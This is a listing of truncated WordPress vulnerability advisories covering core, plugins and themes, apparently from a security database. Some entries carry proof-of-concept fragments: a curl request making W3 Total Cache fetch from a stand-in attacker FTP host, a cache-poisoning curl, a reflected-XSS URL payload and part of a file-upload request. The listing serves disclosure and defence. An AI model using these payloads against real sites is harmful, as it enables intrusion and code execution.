14602 matches found
WP < 6.0.3 - Content from Multipart Emails Leaked
Description When sending multiple emails within one request thus resuing the PHPMailer instance, the plain text content of the first multipart email leaks to the subsequent non-multipart emails as AltBody/plaintext email...
Admin Custom Login <= 2.4.7.1 - Authenticated Stored Cross-Site Scripting (XSS)
The Admin Custom Login WordPress plugin was affected by an Authenticated Stored Cross-Site Scripting XSS security vulnerability...
Freemius SDK < 2.5.10 - Reflected Cross-Site Scripting
Description The Freemius SDK for WordPress does not adequately sanitize inputs or escape outputs, leading to Reflected Cross-Site Scripting. This directly affects over 1000 plugins and themes that use this SDK...
Parallax Scroll <= 2.0.1 - Cross-Site Scripting (XSS)
The Parallax Scroll by adamrob.co.uk WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability...
Clicky by Yoast <= 1.5 - Minor Security Improvements
From the changelog: - Only allow expected characters in user settings thanks to a report by Netsparker. - Proper escaping of translated string in image attributes...
WooCommerce < 6.3.1 - Orders Marked as Paid (via PayPal Standard Gateway)
The PayPal Standard payment gateway deprecated since July 2021 of the plugin could allow attackers to mark an order as paid without actually making a payment, when PDT is enabled...
Elementor Website Builder < 3.13.2 - Missing Authorization
The plugin does not check user capabilities on several functions, allowing authenticated attackers with a low amount of privilege such as Subscribers to perform actions that should only be available to users with higher privileges...
WooCommerce < 6.2.1 - Path Traversal via Importers
The plugin does not properly check for path traversal when importing tax rates. There are limited details at this stage and this advisory will be updated later on...
Backup Guard < 1.6.0 - Authenticated Arbitrary File Upload
The plugin did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users admin+ to upload arbitrary files, including PHP ones, leading to RCE. Additional Info, and Bypass of .htaccess protection found by WPScanTeam, while confirming the issue: There is...
WPBakery Page Builder < 6.13.0 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks...
WP < 6.2.1 - Contributor+ Stored XSS via Open Embed Auto Discovery
Description WordPress does not validate the protocol when processing oEmbed discovery, which could allow users with the Contributor role and above to perform Stored Cross-Site Scripting attacks...
WP Data Access < 5.3.8 - Subscriber+ Privilege Escalation
The plugin does not have authorisation in the multiplerolesupdate function, allowing any authenticated users, such as subscriber to update their role and set themselves as admin for example, when the 'Enable role management' setting is enabled...
Elementor < 3.18.2 - Contributor+ Arbitrary File Upload to RCE via Template Import
Description The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server. PoC 1. Edit a post in Elementor. 2. Import a template...
Essential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalation
The plugin does not validate the password reset key, which could allow unauthenticated attackers to reset arbitrary account's password to anything they want, by knowing the related email or username, gaining access to them...
WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
Description A JavaScript payload such as "javascript:alert1" in a URL could cause a Cross-Site Scripting XSS vulnerability. According to the commit message see references: "wpksesbadprotocol makes sure to validate that uri attributes don’t contain invalid/or not allowed protocols. While this work...
Paid Memberships Pro 1.4.7 - adminpages/memberslist-csv.php Direct Request Member Personal Information Disclosure
The Paid Memberships Pro WordPress plugin was affected by an adminpages/memberslist-csv.php Direct Request Member Personal Information Disclosure security vulnerability...
Vision Interactive For WordPress < 1.5.4 - Contributor+ Stored XSS
The plugin does not sanitise and escape some of its settings, which could allow users such as contributor+ to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. PoC 1. Create a new vision item with whatever role, even if it's an Administrator 2...
WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query
Description Due to lack of proper sanitization in WPMetaQuery, there's potential for blind SQL Injection...
blnmrpb - Webshell in Fake Plugin
Sucuri Labs found that a fake plugin, which is a Webshell...
WP < 6.0.3 - Reflected XSS via SQLi in Media Library
Description WordPress does not properly escape input in the Media Library, which could lead to a Reflected Cross-Site Scripting issue...
Elementor Website Builder < 3.20.3 - Contributor+ DOM Stored XSS
Description The plugin is vulnerable to Stored Cross-Site Scripting via the plugin's Path Widget due to insufficient output escaping on user supplied attributes, allowingnauthenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execut...
Comments - wpDiscuz < 7.3.2 - Admin+ Stored Cross-Site Scripting
The plugin does not properly sanitise or escape the Follow and Unfollow messages before outputting them in the page, which could allow high privilege users to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. Timeline: May 18th, 2021 - Vendor...
WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution
Description WordPress does not restrict which shortcode can be excuted via the parsemediashortcode AJAX action, allowing any authenticated user, such as subscriber to execute arbitrary shortcodes...
WoodMart < 7.1.2 - Unauthenticated Arbitrary Shortcode Injection
The theme could allow arbitrary shortcode to be injected when the "Display results from blog" settings is enabled, which could lead to Reflected XSS for example, when using a shortcode vulnerable to XSS PoC When the "Display results from blog" settings is enabled:...
WordPress 5.4 to 5.8 - Authenticated XSS in Block Editor
Description On September 9, 2021 WordPress version 5.8.1 was released fixing three vulnerabilities. The official blog post states: "Props to Michał Bentkowski of Securitum for reporting a XSS vulnerability in the block editor." Further details: The issue allows an authenticated but low-privileged...
WP Statistics <= 12.6.3 - Referer Cross-Site Scripting (XSS)
The WP Statistics WordPress plugin was affected by a Referer Cross-Site Scripting XSS security vulnerability...
Essential Addons for Elementor < 5.0.5 - Unauthenticated LFI
The plugin does not validate and sanitise some template data before it them in include statements, which could allow unauthenticated attackers to perform Local File Inclusion attack and read arbitrary files on the server, this could also lead to RCE via user uploaded files or other LFI to RCE...
Call Now Accessibility Button < 1.1 - Admin+ Stored Cross Site Scripting
Description The plugin does not properly sanitize some of its settings, which could allow high-privilege users to perform Stored Cross-Site Scripting XSS attacks even when the unfilteredhtml capability is disallowed for example in multisite setup. PoC 1. In the plugin's "Quick Start" field, add...
File Manager 6.0-6.9 - Unauthenticated Arbitrary File Upload leading to RCE
Seravo noticed multiple cases where WordPress sites were breached using 0-day in wp-file-manager confirmed with v6.8, which was the latest version available in wordpress.org. File lib/php/connector.minimal.php can be by default opened directly, and this file loads...
Elementor < 3.5.5 - Iframe Injection
Description The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs. PoC...
WP Super Cache < 1.9 - Unauthenticated Cache Poisoning
The plugin is affected by a cache poisoning issue PoC curl 'https://example.com//?s=12333'...
Elementor Website Builder < 3.21.6 - Contributor+ DOM Stored XSS
Description The plugin is vulnerable to DOM-Based Stored Cross-Site Scripting via the ‘hoveranimation’ parameter due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web...
Elementor < 3.0.14 - SVG Upload Allowed by Default
The plugin allowed SVG files to be uploaded by default, which might lead to security issues, such as Cross-Site Scripting...
W3 Total Cache <= 0.9.7.3 - Blind SSRF and RCE via phar
The implementation of opcacheflushfile calls fileexists with a parameter fully controlled by the user. PoC curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c=flushfile=ftp://y.y.y.y:zzzz/' Note: The nonce value is given by...
WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs
Description Low-privileged authenticated users like author in WordPress core are able to execute JavaScript/perform stored XSS attack via post slugs, which can affect high-privileged users...
Fusion Builder < 3.6.2 - Unauthenticated SSRF
Description The plugin, used in the Avada theme, does not validate a parameter in its forms which could be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network...
Perfect Survey < 1.5.2 - Unauthenticated SQL Injection
The plugin does not validate and escape the questionid GET parameter before using it in a SQL statement in the getquestion AJAX action, allowing unauthenticated users to perform SQL injection. PoC The questionid must start with an existing post ID...
WPBakery Page Builder < 6.4.1 - Authenticated Stored Cross-Site Scripting (XSS)
Wordfence discovered an Authenticated Stored Cross-Site Scripting XSS security vulnerability within the WPBakery Page Builder WordPress plugin. The vulnerability could allow a low privileged user, such as contributor, to inject malicious JavaScript into posts. PoC "Exploit Post", "content" = "\n...
Avada < 7.11.7 - Unauthenticated Sensitive Information Exposure via Form Uploads Directory Listing
Description The Avada theme for WordPress is vulnerable to Sensitive Information Exposure via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism. PoC Acce...
WordPress < 5.8.2 - Expired DST Root CA X3 Certificate
Description The wp-includes/certificates/ca-bundle.crt file contains a DST Root CA X3 which expired on September 30th, 2021, raising security warning in some cases...
Email Subscribers & Newsletters < 4.3.1 - Unauthenticated Blind SQL Injection
The Email Subscribers & Newsletters – Simple and Effective Email Marketing WordPress Plugin WordPress plugin was affected by an Unauthenticated Blind SQL Injection security vulnerability...
Astra < 4.6.5 - Editor+ Stored XSS via Theme Header/Footer
Description The theme is vulnerable to Stored Cross-Site Scripting via the theme header and footer content due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access, to inject arbitrary web scripts in pages that will...
WP < 6.3.2 - Contributor+ Comment Disclosure
Description WordPress does not properly restrict comments to be accessed, allowing contributor to read comments on private and password protect posts they don't have access to...
JetEngine < 3.1.3.1 - Author+ Remote Code Execution
The plugin includes uploaded files without adequately ensuring that they are not executable, leading to a remote code execution vulnerability. PoC fetch"/wp-admin/admin.php?action=jetengineformsimport", "headers": "accept": "text/html", "content-type": "multipart/form-data;...
Zeno Font Resizer < 1.8.0 - Admin+ Stored XSS
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup...
WP < 6.0.3 - Open Redirect via wp_nonce_ays
Description WordPress does not validate the URL to redirect the user to when displaying the nonce error via wpnonceays, which could lead to an Open Redirect issue...
Elementor 3.6.0-3.6.2 - Subscriber+ Arbitrary File Upload
The plugin is lacking capability check in a function hooked to admininit introduced in v3.6.0, and only relying on a CSRF check. As the nonce is available to any authenticated users, they could call it and upload a malicious zip archive containing arbitrary files via a subsequent call, leading to...
Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. PoC Upload: The following...
WPML Multilingual CMS < 4.6.1 - Reflected Cross-Site Scripting
The plugin does not escape some URL attributes before outputting them to a page, leading to a Reflected Cross-Site Scripting vulnerability. PoC After setting up the plugin, visit the following URL: /wp-login.php?wplang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert0%0c...
Elementor Website Builder < 3.12.2 - Admin+ SQLi
The plugin does not properly sanitize and escape the Replace URL parameter in the Tools module before using it in a SQL statement, leading to a SQL injection exploitable by users with the Administrator role. PoC 1. Go to Elementor Tools Replace URL 2. Fill the first field with...